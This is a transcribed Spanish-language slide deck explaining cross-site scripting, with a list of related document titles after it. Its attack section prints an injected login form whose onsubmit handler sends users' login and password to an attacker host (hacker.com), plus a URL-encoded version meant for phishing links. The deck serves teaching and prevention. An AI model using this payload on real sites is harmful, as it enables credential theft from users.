ARE YOUR WEB VULNERABLE?
|
|
- José Francisco Molina Villalobos
- hace 8 años
- Vistas:
Transcripción
1 CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero
2 ÍNDICE Introducción Cross-site scripting HTTP y HTML Ataque avanzado con XSS Métodos de prevención 2 2
3 Introducción Cross-site scripting: Consiste en enmascarar el origen de la dirección web objetivo de tal manera que el atacante consigue un acceso completo a dicha web pudiendo enviar datos e información confidencial a su propio servidor. Este agujero de seguridad también es conocido como XSS. Se utiliza para obtener información de formularios. Ejemplo: Recibimos un mail con una supuesta promoción para la cual se necesitan introducir los datos de la tarjeta de crédito, datos que quedan a disposición del atacante. 3 3
4 Cross-site site Scripting Ocurre cuando se genera una página web dinámica que contiene una entrada de datos cuya validación no es la correcta. Esto permite que el atacante inserte JavaDcript malicioso dentro del código de generación de la página para ejecutarlo en las má quinas de aquellos usuarios que accedan a ellas. Afecta a cualquier página que requiera una validación de datos para acceder a ciertos servicios aunque se ven especialmente afectados los motores de búsqueda y los formularios que hay que el usuario rellena manualmente. 4 4
5 Cross-site Scripting Un ataque de XSS, ejecutado de manera correcta, permite: 1. Comprometer la confidencialidad de la información. 2. Ejecutar código malicioso sin que el usuario del recurso web pueda notificarlo. 3. Manipular o robar cookies. 4. Crear respuestas erróneas para usuarios validos. Por lo tanto y al tener una relación con el servicio de paquetes web y el buscador web de los usuarios, es necesario tener unas nociones de HTTP y HTML. 5 5
6 HTTP (Hiper Text Transfer Protocol) Es el protocolo más utilizado para la transferencia y recepción de documentos HTML a través de World Wide Web (WWW). El aspecto más importante t de este protocolo es como manejan los servidores las peticiones de los usuarios/clientes, estableciendo una conexión cliente-servidor: Cuando nuestro buscador se conecta a la red se convierte en un cliente que realiza peticiones a los servidores. Éstos se dedican a contestar todas las peticiones que les llegan. 6 6
7 HTTP (Hiper Text Transfer Protocol) En este momento se establece una conexión no estable que termina al enviarse la respuesta. Es decir, que aunque un mismo usuario realice varias consultas, estas son tratadas y respondidas independientemente, sin conseguir estabilidad en la conexión en ningún momento. Por este motivo, los ataques XSS tienen éxito, ya que una vez el servidor ha aceptado la petición y ha generado, de manera dinámica, la pagina web con la respuesta (afectada por el script malicioso) ya es demasiado tarde y, potencialmente, el daño ya esta hecho. 7 7
8 HTML (HiperText Makeup Language) Los documentos HTML son documentos de texto plano que contienen únicamente caracteres ASCII de 7 bits imprimibles. Siguen una notación basada etiquetas. Et Estas etiquetas t son interpretadas it td por el lbuscador, el cual realiza las acciones sobre el texto que se encuentra dentro de ellas. Ejemplo de documento HTML: <html> <body> <p>example of HTML document</p> <script> alert("html Document") </script> </body> </html> 8 8
9 Ataque avanzado con XSS Gran parte de las paginas web permiten a sus usuarios introducir datos para posteriormente recibir una actualización dinámica del contenido de la web basada en la entrada introducida. Por ejemplo, si se introduce en un buscador asdfghjkl como criterio de búsqueda, el servidor devuelve una página que informa de que la entrada es inválida. Esto parece ser inofensivo, pero si el buscador devuelve Nothing is found for <script>alert('aaa')</script>. éste puede interpretar que se lanza una función de alerta (con todas sus consecuencias) y, por lo tanto, el sistema puede estar en riesgo. 9 9
10 Ataque avanzado con XSS Ejemplo: FREEBANK - Se crea una página del banco Freebank y un servidor Web que recibe información obtenida durante un ataque exitoso. - El atacante busca páginas web que devuelvan información del usuario. - En este caso, el atacante encuentra información cuando el intento de identificación falla. CONTRASEÑA MAL INTRODICIDA La página muestra el nombre de usuario introducido. - El atacante sabe que se devuelve info en la página de LogIn. - Además este error se refleja en la barra de direcciones: - Invalid Login: muestra que no hay información de conexión para BadLogin - En este punto, el atacante sólo tiene que insertar su código HTML malicioso y suplantar la página web
11 Ataque avanzado con XSS 11 11
12 Ataque avanzado con XSS El atacante introduce en el nombre de usuario a line of script (sentencia de código). Afecta al código de salida de la pagina web cambiando err=invalid: Login: BadLogin to err=<script>alet('xss')</script> Si la pagina web es vulnerable, aparece el siguiente i recuadro: 12 12
13 Ataque avanzado con XSS En este momento, el atacante sabe de la vulnerabilidad y sólo le queda atacar inyectando su código malicioso, con la intención de robar el usuario y la contraseña. El código inyectado será algo así: <TABLE> <TR> <TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="217"> <FORM ACTION="login1.asp" METHOD="post"> <CENTER></form> <form action= login1.asp method= post onsubmit= XSSimage = new Image; XSSimage.src= + document.forms(1).login.value + : + document.forms(1).password.value; > <br>username:<br><input TYPE="text" NAME="login" STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR> <INPUT TYPE="password Código modificado con intenciones de robar la contraseña y el usuario
14 Ataque avanzado con XSS Tras esto, solo le queda añadirlo a la página web de la siguiente manera y esperar a las posibles víctimas: tename=prod_sel.forte&source=freebank&ad_referring_url= k.com&err=%3c/form%3e%3cform%20action=%22login1.asp%22%20method=%22po p st%22%20onsubmit=%22xssimage%20=%20new%20image;xssimage.src=' w.hacker.com/'%20%2b%20document.forms(1).login.value%20%2b%20':'%20%2b%20 document.forms(1).password.value;%22%3e Ahora, por ejemplo, puede enviar mails a los clientes del banco haciendo que estos hagan click en el link malicioso: 14 14
15 Métodos de prevención Validar los datos introducidos: Consiste en limitar los parámetros que podemos introducir en el campo que estemos usando, es decir limitarlo al uso a letras y números, permitiendo unicamente en el . Validar los datos de respuesta/salida: Es decir, crear un filtro y validar los datos de respuesta antes de devolverlos al usuario. Utilizar Bowsers : - Actualizar las vulnerabilidades bowsers que pueda tener nuestra página web e instalar parches. - Utilizar aplicaciones como HP WebInspect software para testear las posibles vulnerabilidades de nuestras aplicaciones web
Ataques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesCross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es
Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro www.noveria.es antonio@noveria.es # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés,
Más detallesGUÍAS FÁCILES DE LAS TIC
GUÍAS FÁCILES DE LAS TIC del COLEGIO OFICIAL DE INGENIEROS DE TELECOMUNICACIÓN Trabajo Premiado 2006 Autor: La Red Internet D. Gerson Aires Casas 17 de Mayo 2006 DIA DE INTERNET GUÍAS FÁCILES DE LAS TIC
Más detallesDOCS. Pautas básicas para el DESARROLLO DE PLUGINS
Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................
Más detallesS E G U R I D A D E N A P L I C A C I O N E S W E B
H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A
Más detallesDetectar y solucionar infecciones en un sitio web
Detectar y solucionar infecciones en un sitio web Cardenal Gardoki, 1 48008 BILBAO (Vizcaya) Teléfono: 902 012 199 www.hostalia.com Las infecciones que sufren los sitios web son uno de los principales
Más detalles################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ##################
################## # Cross Site Scripting [XSS] # Autor: sl4xuz # Contact: sl4x.xuz@gmail.com ################## [~] Indice [~] 0x01 - Introducción 0x02 - Qué es XSS? 0x03 - Casos en que se presenta XSS
Más detallesManual Intranet Área de Sistemas
Manual Intranet Área de Sistemas ManualIntranet.doc Fecha de modificación 15/01/2007 9:59:00 Página 1 de 6 1. QUE ES Y COMO FUNCIONA UNA INTRANET El centro de una Intranet es la World Wide Web. En muchos
Más detallesCapítulo 2.- Vulnerabilidades en aplicaciones web.
Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como
Más detallesGUÍA Nro. 1 TECNOLOGÍA DE INTERNET. TIII PIII
GUÍA Nro. 1 TECNOLOGÍA DE INTERNET. TIII PIII GUIA DISPONIBLE EN: http://preparadorivan.blogspot.com/ - http://preparadormssi.50webs.com/inicio.html La World Wide Web o la Web, es una de las múltiples
Más detallesEjemplos básicos de webmathematica para profesores
Ejemplos básicos de webmathematica para profesores Cualquier cálculo hecho dentro Mathematica puede ser realizado usando webmathematica con dos limitaciones significativas. Primero, al usar webmathematica,
Más detalleshttp://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com
XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones
Más detallesSeguridad Informática
Universidad Rey Juan Carlos Grado en Ingeniería Informática Seguridad Informática Curso 2012/13 Prueba 3 - Seguridad en es Lea detenidamente las instrucciones del examen antes de comenzar: El examen consta
Más detallesServicio de Alta, Baja, Modificación y Consulta de usuarios Medusa
Documentos de Proyecto Medusa Documentos de: Serie: Manuales Servicio de Alta, Baja, Modificación y Consulta del documento: Fecha 22 de febrero de 2007 Preparado por: José Ramón González Luis Aprobado
Más detallesMANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO
MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO Fecha última revisión: Junio 2011 INDICE DE CONTENIDOS HERRAMIENTA DE APROVISIONAMIENTO... 3 1. QUÉ ES LA HERRAMIENTA DE APROVISIONAMIENTO... 3 HERRAMIENTA
Más detallesCÓMO CREAR UNA PÁGINA WEB
CÓMO CREAR UNA PÁGINA WEB v.2 Índice 1 Introducción 3 2. Diseño gráfico 3 3. El Lenguaje HTML 3 4. Alojamiento y publicación 5 5. Promoción 8 6. Otras utilidades 9 6.1 Estadísticas 9 6.2 Contadores y Formularios
Más detallesSECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web
Más detallesSu Seguridad es Nuestro Éxito
Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio
Más detallesOFICINA VIRTUAL SIS MANUAL DE TUTOR
OFICINA VIRTUAL SIS MANUAL DE TUTOR Copyright 2005 SENA - CEV Comunidad Educativa Virtual - Todos los derechos reservados. BUSCAR IMPRIMIR TABLA DE CONTENIDOS Página 1 de 22 BUSCAR IMPRIMIR TABLA DE CONTENIDOS
Más detallesInfraestructura Tecnológica. Sesión 5: Arquitectura cliente-servidor
Infraestructura Tecnológica Sesión 5: Arquitectura cliente-servidor Contextualización Dentro de los sistemas de comunicación que funcionan por medio de Internet podemos contemplar la arquitectura cliente-servidor.
Más detallesConfigurar cuenta de correo en Outlook 2010
Configurar cuenta de correo en Outlook 2010 Abra el programa Microsoft Outlook 2010 y siga los siguientes pasos para configurarlo: Paso 1. En el menú seleccione Archivo, ahí se encuentra en el menú de
Más detalles15 CORREO WEB CORREO WEB
CORREO WEB Anteriormente Hemos visto cómo funciona el correo electrónico, y cómo necesitábamos tener un programa cliente (Outlook Express) para gestionar los mensajes de correo electrónico. Sin embargo,
Más detallesLogin y Password. Elección de directorios confidenciales
Login y Password La verdadera funcionalidad del programa tiene lugar cuando usted no tiene en su poder el ordenador donde lo instala. Por lo tanto, es importante que usted recuerde su login y password
Más detallesMovistar Imagenio Keteké (Comunidad MoviStar) MANUAL DE USUARIO
Keteké (Comunidad MoviStar) MANUAL DE USUARIO Versión: 1 Publicación: Mayo 2010 Este manual de servicio es propiedad de Telefónica de España SAU, queda terminante prohibida la manipulación total o parcial
Más detallesGuía Rápida de Inicio
Guía Rápida de Inicio 1. Acerca de esta Guía Esta guía le ayudará a instalar y dar los primeros pasos con BitDefender Security for SharePoint. Para disponer de instrucciones detalladas, por favor, diríjase
Más detallesEscudo Movistar Guía Rápida de Instalación Dispositivos Symbian
Escudo Movistar Guía Rápida de Instalación Dispositivos Symbian Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3
Más detallesPentesting con OWASP Zed Attack Proxy
Pentesting con OWASP Zed Attack Proxy 1. Introducción ZAP es una poderosa herramienta para realizar ataques de penetración (disciplina conocida como Pentesting), que permite analizar sitios web para buscar
Más detallesEscudo Movistar Guía Rápida de Instalación Para Windows
Escudo Movistar Guía Rápida de Instalación Para Windows Guía de Instalación Página 1 Índice ESCUDO MOVISTAR.... 3 1. INSTALACIÓN DEL SERVICIO ESCUDO MOVISTAR... 3 1.1. VERSIONES SOPORTADAS... 3 1.2. DISPOSITIVOS
Más detallesManual SAAE México 2012 EMPRESAS 2012. Manual para Software de Administración de Alumnos y Egresados
EMPRESAS 2012 Manual para Software de Administración de Alumnos y Egresados 17 1. Publicar un aviso gratis Ingrese al banner Publique su aviso gratis ubicado en la página principal del portal. Inmediatamente,
Más detalles13.2 WORLD WIDE WEB (www)
13.2 WORLD WIDE WEB (www) INTRODUCCIÓN World Wide Web o simplemente web se puede traducir como la telaraña mundial, haciendo referencia al hecho de que existen multitud de servidores web distribuidos por
Más detallesWeb: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen
Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.
Más detallesDOCENTES FORMADORES UGEL 03 PRIMARIA
DOCENTES FORMADORES UGEL 03 PRIMARIA 1. Recursos y Aplicaciones del Servidor La página de inicio del servidor (http://escuela) contiene los enlaces a las aplicaciones instaladas en el servidor, un enlace
Más detallesReflexión. Inicio. Contenido
Exploradores de Internet Navegador WEb Reflexión "Una máquina puede hacer el trabajo de 50 hombres corrientes. Pero no existe ninguna máquina que pueda hacer el trabajo de un hombre extraordinario. Elbert
Más detallesManual de usuario investigador
Manual de usuario investigador Para poder solicitar un proyecto lo primero que tiene que hacer un investigador es iniciar sesión con su usuario en la web. Para ello debe pulsar en el icono situado en la
Más detallesFUNDAMENTOS DE REDES CONCEPTOS DE LA CAPA DE APLICACIÓN
FUNDAMENTOS DE REDES CONCEPTOS DE LA CAPA DE APLICACIÓN Mario Alberto Cruz Gartner malcruzg@univalle.edu.co Conceptos La última capa o Capa 7 del modelo OSI se denomina capa de aplicación. La capa de aplicación
Más detallesHost. En este texto, entenderemos por host toda máquina - léase computadora. Cuenta. Una cuenta, en general, es un espacio de memoria y de disco que
CONCEPTOS BASICOS. Usuario. Un usuario es toda persona que utilice una computadora. Host. En este texto, entenderemos por host toda máquina - léase computadora - conectada a InterNet. También se les llaman
Más detallesCurso de PHP con MySQL Gratis
Curso de PHP con MySQL Gratis Introducción Este mini curso o mini tutorial de PHP le ayudará a realizar cualquier sistema para que pueda insertar uno o varios registros a una base de datos con MySQL, este
Más detallesPRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN
PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN Los protocolos de capa de aplicación de TCP/IP más conocidos son aquellos que proporcionan intercambio de la información
Más detallesTema 1 HTTP y aplicaciones web
Tema 1 HTTP y aplicaciones web Indice 1. HTTP para sitios web estáticos 2. HTTP básico para aplicaciones web 3. Aplicaciones AJAX 4. APIs REST 1.1. HTTP para sitios web estáticos Petición/respuesta HTTP
Más detallesPráctica 6 - Página Web
Práctica 6 - Página Web Teoría. Una Página Web es un recurso de información que esta diseñada para la Word Wide Web (Red Mundial) y puede ser vista por medio un Navegador Web. Esta información se encuentra
Más detallesVisual Chart app. Guía rápida para el usuario
Visual Chart app Guía rápida para el usuario Contenido 1 Introducción 2 Inicio Registro gratuito Guardar credenciales Login automático Recordar contraseña 3 Configuración Acerca de Configurar Consumo de
Más detallesCapitulo 5. Implementación del sistema MDM
Capitulo 5. Implementación del sistema MDM Una vez que se concluyeron las actividades de análisis y diseño se comenzó la implementación del sistema MDM (Manejador de Documentos de MoProSoft). En este capitulo
Más detallesGestión de Procesos de Compra. Documentación Técnico Comercial
Gestión de Procesos de Compra Gestión de Procesos de Compra Página 2 de 8 Qué es I-Compras?... 3 A quién va dirigida la aplicación I-Compras?... 3 Características generales de la aplicación... 3 Flujo
Más detallesMANUAL DE AYUDA. SAT Móvil (Movilidad del Servicio Técnico)
MANUAL DE AYUDA SAT Móvil (Movilidad del Servicio Técnico) Fecha última revisión: Abril 2015 INDICE DE CONTENIDOS INTRODUCCION SAT Móvil... 3 CONFIGURACIONES PREVIAS EN GOTELGEST.NET... 4 1. INSTALACIÓN
Más detallesPUBLICAR EN LA RED. Ponente: Javier Paricio Rodríguez
PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO PUBLICAR COSTE MEDIO DE DISTRIBUCION EQUIPO FORMATO
Más detallesCONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su
Más detallesTema 4. II - Cookies. Arquitecturas Distribuidas 11/12
Tema 4. II - Cookies Arquitecturas Distribuidas 11/12 1 II. Cookies 1. Necesidad de mantener información de estado y HTTP 2. Sesiones 3. Qué son las cookies? 4. Funcionamiento de cookies 5. Envío de cookies
Más detallesTEMA 4: EMPEZANDO A NAVEGAR ESCUELA UNIVERSITARIA DE INFORMÁTICA. Raúl Martín Martín
TEMA 4: EMPEZANDO A ESCUELA UNIVERSITARIA DE INFORMÁTICA NAVEGAR Raúl Martín Martín SERVICIOS DE INTERNET SERVICIOS DE INTERNET Las posibilidades que ofrece Internet se denominan servicios. Hoy en día,
Más detallesAutoafiliación Banca de Personas y Empresas
1 Autoafiliación Banca de Personas y Empresas Este nuevo servicio les permite a nuestros clientes de Banca de Personas y Empresas autoafiliarse a Banesconline. A. Ingreso a BanescOnline Para poder autoafiliarse
Más detallesPara que sea posible ganar la agilidad deseada en la gestión documental nos hace falta vuestra colaboración:
MANUAL E-COORDINA Con la finalidad de garantizar la seguridad y la salud de los trabajadores que puedan concurrir en un mismo centro de trabajo, y de asegurar el cumplimiento de la normativa en materia
Más detallesAPLICATECA. didimo Marketing. Manual de usuario. By DIDIMO Servicios Móviles. www.telefonica.es
APLICATECA didimo Marketing Manual de usuario. By DIDIMO Servicios Móviles www.telefonica.es APLICATECA INDICE INDICE... 2 1 QUÉ ES DIDIMO MARKETING?... 3 2 MENÚ PRINCIPAL... 4 2.1 CAMPAÑAS... 4 2.1.1
Más detallesManual de Usuario: Market Interact Basic
Manual de Usuario: Market Interact Basic La fibra no tiene competencia ÍNDICE Introducción Contactos Importación Gestión de duplicados Grupos objetivo Nuevo grupo y asociación de contactos Nuevo grupo
Más detallesDIPLOMADO EN SEGURIDAD INFORMATICA
DIPLOMADO EN SEGURIDAD INFORMATICA Modulo 9: Soporte Computacional Clase 9_3:Protocolos de comunicación y conectividad de arquitecturas multiplataforma. Director Programa: César Torres A Profesor : Claudio
Más detallesINFORMÁTICA IE. Términos a conocer y conceptos básicos. World Wide Web (WWW):
INFORMÁTICA IE MÓDULO INTERNET Términos a conocer y conceptos básicos World Wide Web (WWW): Digamos, simplemente, que es un sistema de información, el sistema de información propio de Internet. Sus características
Más detallesComo crear una cuenta en PayPal?
GUÍA PARA CREAR UNA CUENTA EN PAYPAL El objetivo de ésta guía es ayudar al cliente a crear una cuenta y a pagar usando este servicio gratuito que da una completa seguridad en las compras por Internet.
Más detallesComisión Nacional de Bancos y Seguros
Comisión Nacional de Bancos y Seguros Manual de Usuario Capturador de Pólizas División de Servicios a Instituciones Financieras Mayo de 2011 2 Contenido 1. Presentación... 3 1.1 Objetivo... 3 2. Descarga
Más detallesLaboratorio 6. Creación de sitios Web - Dreamweaver
UNIVERSIDAD CARLOS III DE MADRID. ESCUELA DE TURISMO. Informática aplicada al sector turístico Laboratorio 6. Creación de sitios Web - Dreamweaver El objetivo de este laboratorio es aprender a crear sitios
Más detallesPasarela de desarrollo API DTMF (marcación por tonos).
Pasarela de desarrollo API DTMF (marcación por tonos). La pasarela de desarrollo API DTMF (marcación por tonos) permite conectar tu vpbx con tu sistema web de datos. La pasarela de desarrollo API DTMF
Más detallesInstrucciones de Funcionamiento del Sistema AntiVirus y AntiSpam Profesional
Instrucciones de Funcionamiento del Sistema AntiVirus y AntiSpam Profesional Si su dominio ha sido incluido en el sistema de control de AntiVirus y AntiSpam Profesional de DEINFO Servicios Informáticos
Más detallesControl de accesos autónomo por huella dactilar
Manual de software Control de accesos autónomo por huella dactilar Access FP (SOFTWARE PARA LECTOR DE HUELLA DACTILAR SIMON ALERT REF.: 8902003-039) (Versión de sofware 1.1) (Versión de documento 1.2)
Más detallesCONDICIONES GENERALES DE COMPRA Y/O USO DE LA PÁGINA WEB.
CONDICIONES GENERALES DE COMPRA Y/O USO DE LA PÁGINA WEB. Las presentes Condiciones Generales tienen por objeto regular el acceso y/o uso de la página web de la EDITORIAL CIUDAD NUEVA. Asimismo enumeran
Más detallesProyecto: Buscador de Películas usando XQuery y exist
Buscador de Películas usando XQuery y exist Arquitecturas de Altas Prestaciones Rafael Martos Llavero I. Objetivo del Proyecto. El objetivo del proyecto es la creación de una base de datos basada en XML
Más detallesProgramación páginas web. Servidor (PHP)
Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.
Más detallesPuedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo?
Puedo estar tranquilo acerca de la información de mi empresa? Donde puedo poner mis archivos cuando viajo? Cómo hago llegar esta información confidencial a mis gerentes o clientes? Necesito un lugar donde
Más detallesEscribiendo el HTML. Un formulario se declara entre estos dos tags:
Formularios Un formulario HTML sirve como principal punto de interacción con el usuario: mediante ellas, podemos hacer posible la interacción de nuestra página Web para con el usuario que visita nuestro
Más detallesMANUAL PARA LA GESTIÓN DEL PRÉSTAMO ENTRE LAS BIBLIOTECAS DE LA RED DE LECTURA PÚBLICA DE EUSKADI
MANUAL PARA LA GESTIÓN DEL PRÉSTAMO ENTRE LAS BIBLIOTECAS DE LA RED DE LECTURA PÚBLICA DE EUSKADI El presente documento recoge el procedimiento mediante el cual las bibliotecas pertenecientes a la red
Más detallesMANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO
MANUAL DE AYUDA HERRAMIENTA DE APROVISIONAMIENTO Fecha última revisión: Marzo 2016 INDICE DE CONTENIDOS HERRAMIENTA DE APROVISIONAMIENTO... 2 1. QUÉ ES LA HERRAMIENTA DE APROVISIONAMIENTO... 2 HERRAMIENTA
Más detallesH O T E L W I N Configuración del motor de Reservas on line
H O T E L W I N Configuración del motor de Reservas on line Introducción Dado el enorme desarrollo de Internet en los últimos años y al sin fin de oportunidades que Internet brinda tanto a clientes como
Más detallesManual Oficina Web de Clubes (FBM)
Manual Oficina Web de Clubes (FBM) INTRODUCCIÓN: La Oficina Web de Clubes de Intrafeb es la oficina virtual desde la que un club podrá realizar las siguientes operaciones durante la temporada: 1. Ver información
Más detallesPropuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA
Propuesta de Portal de la Red de Laboratorios Virtuales y Remotos de CEA Documento de trabajo elaborado para la Red Temática DocenWeb: Red Temática de Docencia en Control mediante Web (DPI2002-11505-E)
Más detallesEl e-commerce de Grupo JAB es una herramienta que permite a los clientes del Grupo, realizar un amplio conjunto de servicios de consulta, petición y
El de Grupo JAB es una herramienta que permite a los clientes del Grupo, realizar un amplio conjunto de servicios de consulta, petición y compra en los diversos almacenes del Grupo JAB. En concreto podremos:
Más detallesSISTEMA DE CONTROL DE PRESENCIA
SISTEMA DE CONTROL DE PRESENCIA 1 SISTEMA DE CONTROL DE PRESENCIA 1 1 GENERALIDADES DE LA APLICACIÓN 3 2 SEGURIDAD Y ACCESO AL PROGRAMA 7 2.1 Mantenimiento de usuarios 7 2.2 Perfiles 9 3 GESTIÓN DE EMPRESAS
Más detallesGuía de doble autenticación
Guía de doble autenticación Índice Guía doble autenticación 1. Introducción a la Doble Autenticación: Qué es? 4 Ataques a las contraseñas 6 Fuerza bruta 6 Malware 6 Phishing 6 Ataques a servidores 6 2.
Más detallesIntroducción a la plataforma Moodle Aníbal de la Torre 2006. Plataforma Moodle. Accediendo a los contenidos
Plataforma Moodle Accediendo a los contenidos Formatos ----------------------------------------------------------------------- 2 Glosarios -----------------------------------------------------------------------
Más detallesMANUAL DEL USUARIO DE MEDINTECH. VERSION 0.1
INTRODUCCIÓN A MEDINTECH ESTADO INICIAL: FASE DE TESTEO DIRECCIÓN WEB: http://piloto.medintech.es SECCIÓN: IDEAS Página 1 de 15 En la sección ideas/ofertas se pueden ver las ideas/propuestas de proyectos
Más detallesMINT A NIVEL BROSERW CON BEEF
MINT A NIVEL BROSERW CON BEEF Y METASPLOIT Como usuario seguimos con las mismavulnerabilidades 17 DE ABRIL DEL 2015 SANTA CRUZ BOLIVIA WALTER CAMAMA MENACHO About Me About Me - Ingeniero de sistemas Universidad
Más detallesMANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD
MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...
Más detallesDECLARACIÓN DE PRIVACIDAD DE FONOWEB
DECLARACIÓN DE PRIVACIDAD DE FONOWEB Fonoweb se compromete a respetar su privacidad y la confidencialidad de su información personal, los datos de las comunicaciones y el contenido de las comunicaciones
Más detallesUNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER
UNIDAD DIDACTICA 16 USUARIOS SAMBA EN UN CONTROLADOR DE DOMINIO LINUX SERVER Eduard Lara 1 1. INTRODUCCIÓN En Windows Server: - Los usuarios y grupos dados de alta cuando el equipo es un servidor independiente,
Más detallesInstalación. Interfaz gráfico. Programación de Backups. Anexo I: Gestión de la seguridad. Manual de Usuario de Backup Online 1/21.
1/21 Instalación Interfaz gráfico Requerimientos Proceso de instalación Pantalla de login Pantalla principal Descripción de los frames y botones Programación de Backups Botones generales Botones de programación
Más detallesManual de Usuario CPM. Consulta Puntual Mínima
Manual de Usuario Consulta Puntual Mínima ÍNDICE DE CONTENIDOS INTRODUCCIÓN Sobre Consulta Puntual Mínima USO DEL SISTEMA 1. Primer acceso - Generación de usuario y contraseña 2. Busqueda de Personas 3.
Más detallesAceptamos que realice este proyecto que le hemos solicitado con las siguientes condiciones:
Aceptamos que realice este proyecto que le hemos solicitado con las siguientes condiciones: La información, textos, imágenes, datos, extensiones que encuentre en la webs indicadas, son de nuestra propiedad
Más detallesMANUAL DE USUARIO Mensa-Red Empresas (OUTLOOK 2002, 2003 y XP)
Bienvenido a la ayuda de Mensa-Red Empresas edición e-mail Vodafone. Pulse sobre las distintas opciones para resolver sus dudas. i.conectar (autenticación) ii.envío de mensajes iii.recepción de mensajes
Más detallesCortafuegos con Windows 2000 o XP
1 CÓMO MONTAR UN CORTAFUEGOS SIN SOFTWARE ADICIONAL 1 Cortafuegos con Windows 2000 o XP Por José Mariscal Prieto i72maprj@uco.es Página Web Todos los derechos reservados, este texto esta registrado. 1.
Más detallesCapítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable
Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)
Más detallesDescripción del Problema Sistema de Reservaciones de Vuelos
Requisitos: Descripción del Problema Weitzenfeld 1 Descripción del Problema Sistema de Reservaciones de Vuelos El Sistema de Reservaciones de Vuelos es un sistema que permite al usuario hacer consultas
Más detallesMANUAL DE INSTALACIÓN
MANUAL DE INSTALACIÓN MANUAL DE INSTALACIÓN DE GOTELGEST.NET En este breve manual sobre la instalación de la aplicación de Gotelgest.net se explicará todo el proceso que hay que llevar a cabo para que
Más detallesCapítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN
CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR
Más detallesTPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR
TPV VIRTUAL O PASARELA DE PAGOS DE CAJASTUR El TPV (Terminal Punto de Venta) Virtual es un producto dirigido a empresas y comercios, con tienda en internet, que permite el cobro de las ventas realizadas
Más detallesCheckOUT HELP DESK. Una vez en sesión, UD. Podrá registrar problemas, consultas y hacer un seguimiento de los problemas que UD. ha ingresado.
